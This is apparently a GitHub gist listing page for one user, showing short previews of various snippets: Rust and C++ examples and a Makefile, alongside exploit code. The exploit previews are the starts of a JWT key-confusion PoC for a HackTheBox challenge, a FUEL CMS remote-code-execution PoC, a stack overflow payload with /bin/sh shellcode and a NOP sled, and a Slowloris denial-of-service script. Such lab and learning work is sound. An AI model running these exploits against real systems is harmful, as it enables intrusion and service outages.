I hereby claim:
- I am wulfgarpro on github.
- I am wulfgarpro (https://keybase.io/wulfgarpro) on keybase.
- I have a public key ASC8ENkegPmPXmvdtPn9D7MLtZLEmUW4JLAErh-1Zn0p2Ao
To claim this, I am signing this object:
wulfgarpro
/ jwt_forge.py
Last active
January 4, 2024 17:24
HTB "Under Construction" CVE-2015-9235 PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| CVE-2015-9235 PoC, known as | |
| "JWT HS/RSA key confusion vulnerability". | |
| This PoC was used to solve the HTB challenge | |
| "Under Construction" on HackTheBox (HTB). | |
| USAGE: | |
| == | |
| Token was obtained by logging into the |
wulfgarpro
/ LowUtilities.cpp
Created
November 22, 2023 02:32
— forked from D4stiny/LowUtilities.cpp
A dependency-less implementation of GetModuleHandle and GetProcAddress.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // An implementation of GetModuleHandle and GetProcAddress that works with manually mapped modules, forwarded exports, | |
| // without a CRT standard library, and uses no Windows API or dependencies. | |
| // | |
| // Author: Bill Demirkapi | |
| // License: MIT, appended at the bottom of this document if you care about licensing and want to credit me in your own project. | |
| // | |
| #include <Windows.h> | |
| #include <winternl.h> |
wulfgarpro
/ error_iterator.rs
Last active
January 11, 2023 08:21
Stop iterator when error is encountered, and report.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use anyhow::{anyhow, Result}; | |
| fn main() -> Result<()> { | |
| let v = vec![false, true, true]; | |
| let res = v.iter().map(|x| { | |
| println!("looped"); // Loops only two times, not 3. | |
| if *x { | |
| Err(anyhow!("error")) | |
| } else { |
wulfgarpro
/ ignore_override.rs
Created
January 9, 2023 22:41
Build a matcher for a set of glob overrides using the `ignore` crate.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use ignore::WalkBuilder; | |
| use ignore::overrides::OverrideBuilder; | |
| fn main() { | |
| let folder = "/tmp/files"; | |
| let mut override_builder = OverrideBuilder::new(folder); | |
| override_builder.add("!test.txt").unwrap(); | |
| override_builder.add("!test.rs").unwrap(); | |
| let or = override_builder.build().unwrap(); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| void help() { | |
| std::cout << "Help" << std::endl; | |
| } | |
| void option1(std::string arg) { | |
| std::cout << "option1: " << arg << std::endl; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| FUEL CMS v1.4.1 CVE-2018-16763 PoC. | |
| This PoC was derived from: https://www.exploit-db.com/exploits/47138. | |
| """ | |
| import argparse | |
| import urllib | |
| import requests | |
| parser = argparse.ArgumentParser('Fuel CMS v1.4 CVE-2018-16763 PoC') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BUF_SIZE=112 | |
| shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f" | |
| shellcode += "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd" | |
| shellcode += "\x80" | |
| NOP_SLED = "\x90" * (BUF_SIZE - len(shellcode)) | |
| #0xffffd49c | |
| #0xffffd4ac | |
| #0xffffd440 | |
| #0xffffd43c |
wulfgarpro
/ keybase.md
Created
October 6, 2017 10:52
wulfgarpro
/ slowloris.js
Last active
May 23, 2017 06:58
Slowloris example against apache2 on Ubuntu 16.10 (yakkety) "2.4.18-2ubuntu4.1"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict'; | |
| const net = require('net'); | |
| const maxConnections = 200; // Max connections | |
| const host = '127.0.0.1'; | |
| const port = 80; | |
| let connections= []; | |
| function Connection(h, p) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SRCS = a.c | |
| depend: .depend | |
| .depend: $(SRCS) | |
| rm -f ./.depend | |
| $(CC) $(CFLAGS) -MM $^ -MF ./.depend; | |
| include .depend |
NewerOlder